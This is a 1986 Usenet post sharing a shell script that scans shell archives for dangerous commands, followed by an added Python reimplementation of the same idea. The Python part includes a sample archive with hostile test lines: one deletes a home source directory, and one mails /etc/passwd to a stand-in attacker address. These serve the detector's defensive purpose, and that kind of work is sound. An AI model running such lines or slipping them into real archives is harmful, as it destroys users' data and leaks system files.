rdm@hoptoad.uucp (Rich Morin) (09/30/86)
:
# sharks - SHell ARchive checK Script          (N.B., Bourne shell)
#
# The "shar" utility is really a neat hack, but it scares me silly
# from a security perspective.  I DON'T LIKE giving my session over
# to someone else's script, despite the fact that I can take a few
# precautions.  Scanning a shar file for gotchas is impractical,
# since it takes too much time, and one can still miss things.
# Besides, there is even a nifty gotcha I saw that causes vi to
# perform commands while reading in a file(!)
#
# So, I wrote this piece of paranoid code to help me scan shar files
# in a reasonably efficient manner.  It throws away all the here
# document text (using a somewhat naive algorithm), then throws away
# command lines it (quite conservatively) thinks are safe.  The rest
# of the text goes to standard output, for storage and/or perusal.
#
# I'm sure it isn't foolproof.  (It doesn't even TRY to look at the
# code that is being unpacked...)  Still, the resulting output is
# short and sweet, and it tells me everything I want to know before
# submitting my session to the file...
#
# Usage:  sharks foo bar ...
#
# Copyright (C) 1986, Richard Morin.  All Rights Reserved.
#
# Use it (at your own risk, of course), but don't sell it.  Also,
# please let me know about any problems and/or improvements you find.
#
# Richard Morin, proprietor          {hoptoad,leadsv,lll-lcc}!cfcl!rdm
# Canta Forda Computer Lab.          +1 415 994 6860
# Post Office Box 1488               Full spectrum consulting services
# Pacifica, CA 94044 USA             for science and engineering.
#
# P.S.  Long live awk, sed, and sh ! ! !

P='[0-9A-Za-z_-][0-9A-Za-z_-]*'         # pattern for sed script

sed 's/	/ /g' $* |                      # kill off tabs (the pattern holds a literal tab)

awk '                                   # kill off here document text
{
    if (hd == 1) {                      # here document text
        ss2 = $0                        # get test string
        while (substr(ss2,1,1) == " ")
            ss2 = substr(ss2,2)
        if (index(ss2,ss) == 1) {       # end of here text
            hd = 0
            next
        }
    }
    else                                # not here document text
        print $0
}

/<</ {                                  # start of here document?
    if (hd == 1)                        # no, already in one
        next
    hd = 1                              # yes, set up flags
    ss = $0
    ss = substr(ss,index(ss,"<<")+2)
    while (substr(ss,1,1) == " ")
        ss = substr(ss,2)
    fc = substr(ss,1,1)
    if (fc == "'\''") {                 # single quotes used
        ss = substr(ss,2)
        ssq = index(ss,"'\''")
        ss = substr(ss,1,ssq-1)
    }
    else if (fc == "\"") {              # double quotes used
        ss = substr(ss,2)
        ssq = index(ss,"\"")
        ss = substr(ss,1,ssq-1)
    }
    else {                              # no quotes used
        if (fc == "\\")
            ss = substr(ss,2)
        if ((sse = index(ss," ")) > 1)
            ss = substr(ss,1,sse-1)
    }
}
' |
#
# Note that this code is more than a little bit paranoid.  Keep it
# that way...  The code is also rather sprawling, since there seem
# to be about twenty gazillion different versions of shar floating
# about.  Last, if you don't know what it is, don't play with it!!
#
sed '                                   # kill off shar noise
/^ *\/bin\/echo [^`;|(>]*$/d
/^ *\/bin\/echo [^`;|(>]*; \/bin\/ls [^`;|(>]*$/d
/^ *\/bin\/ls [^`;|(>]*$/d
/^ *echo [^`;|(>]*$/d
/^ *echo [^`;|(>]*([^`;|(>]*)'\'' *$/d
/^ *echo [^`;|(>]*; ls [^`;|(>]*$/d
/^ *echo [^`;|(>]*`wc [^`;|(>]*` *$/d
/^ *else *$/d
/^ *exit *[0-9]* *$/d
/^ *fi *$/d
/^ *fi #[^`;|(>]*$/d
/^ *if \[ [0-9A-Za-z]*\$'$P' = '$P' ]; then *$/d
/^ *if \[ `wc -c < [^`;|(>]*` != '$P' ]; then *$/d
/^ *if test -f '\''[^`;|(>]*'\'' *$/d
/^ *if test '$P' != \$1 *$/d
/^ *if test '$P' -ne "`wc -c [^`;|(>]*`" *$/d
/^ *if test '$P' -ne "`wc -c '\''[^`;|(>]*'\''`" *$/d
/^ *if test '$P' -ne "`wc -c < '\''[^`;|(>]*'\''`" *$/d
/^ *ls [^`;|(>]*$/d
/^ *set `sum [^`;|(>]*` *$/d
/^ *then *$/d
/^ *wc [^`;|(>]* | sed [^`;|(>]* | diff -b \$'$P' - *$/d
/^ *'$P'='$P' *$/d
'

exit 0                                  # sh doesn't like signature text...
--
Richard Morin, proprietor          {hoptoad,leadsv,lll-lcc}!cfcl!rdm
Canta Forda Computer Lab.          +1 415 994 6860
Post Office Box 1488               Full spectrum consulting services
Pacifica, CA 94044 USA             for science and engineering.
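The two-stage idea in the post (drop every here-document body, then drop the command lines that look like ordinary shar boilerplate, and read whatever is left before handing the archive to sh) as an added example in Python. This is not Rich Morin's code and not part of his posting; the sample archive is constructed for the example, the allowlist is a short stand-in for his much longer sed list, and the delimiter parsing follows sh quoting rules rather than the awk's leading-space heuristic: 'EOF', "EOF" and \EOF all name EOF, and an unquoted word stops at whitespace or at a redirection or control operator, so `<<EOF>file` yields EOF and not EOF>file. The allowlist also refuses `$`, which the sed patterns allow.

```python
import re

# Constructed sample shar (not a real posting).  Two files, one line that
# should never be in an archive, and a command substitution hidden in an echo.
SAMPLE_SHAR = """\
#! /bin/sh
# This is a shell archive.  Remove anything before this line, then unpack
echo shar: extracting "hello.c" '(58 characters)'
if test -f 'hello.c'
then
\techo shar: will not over-write existing file "'hello.c'"
else
cat << \\SHAR_EOF > 'hello.c'
#include <stdio.h>
int main(void) { puts("hello"); return 0; }
SHAR_EOF
fi
if test 58 -ne "`wc -c < 'hello.c'`"
then
\techo shar: error transmitting "'hello.c'" '(should have been 58 characters)'
fi
rm -rf $HOME/src          # the kind of line the residue is meant to surface
echo shar: `mail attacker@example.com < /etc/passwd`
cat <<'EOF'>README
<< is harmless inside here-document text
EOF
exit 0
"""

_HEREDOC = re.compile(r"<<(-?)\s*")


def heredoc_delimiter(line):
    """Return (delimiter, strip_tabs) if LINE opens a here document, else None."""
    m = _HEREDOC.search(line)
    if not m:
        return None
    rest = line[m.end():]
    strip_tabs = m.group(1) == "-"          # <<- lets the body and terminator be tab-indented
    if not rest:
        return None
    if rest[0] in "'\"":                    # quoted word: everything up to the matching quote
        close = rest.find(rest[0], 1)
        return None if close < 0 else (rest[1:close], strip_tabs)
    if rest[0] == "\\":                     # \EOF quotes the word the same way 'EOF' does
        rest = rest[1:]
    word = re.match(r"[^\s<>|;&()]+", rest)  # unquoted word ends at blank or operator
    return (word.group(0), strip_tabs) if word else None


def strip_here_documents(text):
    """Return the command lines of TEXT with every here-document body removed."""
    out, delim, strip_tabs = [], None, False
    for line in text.splitlines():
        if delim is not None:
            candidate = line.lstrip("\t") if strip_tabs else line
            if candidate == delim:          # exact match, as sh requires
                delim = None
            continue
        out.append(line)
        opened = heredoc_delimiter(line)
        if opened:
            delim, strip_tabs = opened
    return out


# Shapes of shar boilerplate considered safe.  Arguments may not contain
# backquotes, operators, parentheses, redirections or parameter expansion.
WORD = r"[0-9A-Za-z_.-]+"
SAFE_ARGS = r"[^`;|(>&$]*"
_SAFE_SHAPES = [
    r"#.*", r"", r"then", r"else", r"fi", r"exit( [0-9]+)?",
    rf"echo {SAFE_ARGS}",
    rf"echo {SAFE_ARGS}\({SAFE_ARGS}\)'",              # echo shar: extracting "x" '(58 characters)'
    rf"if test -f '{SAFE_ARGS}'",
    rf"if test {WORD} -ne \"`wc -c < '{SAFE_ARGS}'`\"",
    rf"cat <<\s*\\?['\"]?{WORD}['\"]?\s*> '{SAFE_ARGS}'",
    rf"{WORD}={WORD}",
]
SAFE_LINE = re.compile("|".join(rf"^\s*(?:{p})\s*$" for p in _SAFE_SHAPES))


def suspicious_lines(shar_text):
    """Everything that survives both filters: the part a human must read."""
    return [ln for ln in strip_here_documents(shar_text) if not SAFE_LINE.match(ln)]


if __name__ == "__main__":
    for ln in suspicious_lines(SAMPLE_SHAR):
        print(ln)
```

Run against the sample, the residue is three lines: the rm, the echo with the backquoted mail, and `cat <<'EOF'>README` (unquoted target, so not whitelisted), while both here-document bodies, including the `<<` inside the second one, are gone. The residue is conservative by design: anything unrecognised is shown, nothing recognised is trusted blindly. Like the awk in the post, this still treats a `<<` inside a quoted string on a command line as opening a here document, which can only hide later command lines from the reader, so such archives deserve a manual look.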